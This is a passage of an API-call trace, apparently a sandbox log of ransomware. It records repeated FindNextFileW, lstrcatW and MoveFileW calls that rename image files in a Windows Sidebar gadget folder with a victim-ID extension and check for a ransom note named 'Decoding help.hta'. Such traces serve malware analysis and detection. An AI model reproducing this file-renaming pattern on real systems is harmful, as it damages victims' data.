Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\21.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\21.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.448] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="22.png", cAlternateFileName="")) returned 1 [0059.448] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.448] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.448] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.448] lstrcmpiW (lpString1="Decoding help.hta", lpString2="22.png") returned 1 [0059.448] lstrlenW (lpString="22.png") returned 6 [0059.448] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.448] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.448] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="22.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png" [0059.448] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png" [0059.448] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\22.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\22.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.448] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="23.png", cAlternateFileName="")) returned 1 [0059.448] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.448] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.448] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.449] lstrcmpiW (lpString1="Decoding help.hta", lpString2="23.png") returned 1 [0059.449] lstrlenW (lpString="23.png") returned 6 [0059.449] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.449] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.449] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="23.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png" [0059.449] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png" [0059.449] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\23.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\23.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\23.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.449] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc163f09, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc163f09, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="24.png", cAlternateFileName="")) returned 1 [0059.449] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.450] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.450] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.450] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.450] lstrcmpiW (lpString1="Decoding help.hta", lpString2="24.png") returned 1 [0059.450] lstrlenW (lpString="24.png") returned 6 [0059.450] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.450] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.450] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="24.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png" [0059.450] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png" [0059.450] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\24.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\24.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\24.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.450] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc18a068, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc18a068, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x15c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="25.png", cAlternateFileName="")) returned 1 [0059.450] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.450] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.450] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.450] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.450] lstrcmpiW (lpString1="Decoding help.hta", lpString2="25.png") returned 1 [0059.450] lstrlenW (lpString="25.png") returned 6 [0059.450] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.450] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.450] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="25.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png" [0059.451] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png" [0059.451] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\25.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\25.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\25.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.451] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc18a068, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc18a068, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="26.png", cAlternateFileName="")) returned 1 [0059.451] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.451] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.451] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.451] lstrcmpiW (lpString1="Decoding help.hta", lpString2="26.png") returned 1 [0059.451] lstrlenW (lpString="26.png") returned 6 [0059.451] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.451] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.451] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="26.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png" [0059.451] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png" [0059.451] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\26.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\26.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.452] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1b01c7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1b01c7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="27.png", cAlternateFileName="")) returned 1 [0059.452] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.452] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.452] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.452] lstrcmpiW (lpString1="Decoding help.hta", lpString2="27.png") returned 1 [0059.452] lstrlenW (lpString="27.png") returned 6 [0059.452] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.452] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.452] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="27.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png" [0059.452] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png" [0059.452] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\27.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\27.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\27.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.453] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc1d6326, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc1d6326, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7320dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="28.png", cAlternateFileName="")) returned 1 [0059.453] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.453] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.453] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.453] lstrcmpiW (lpString1="Decoding help.hta", 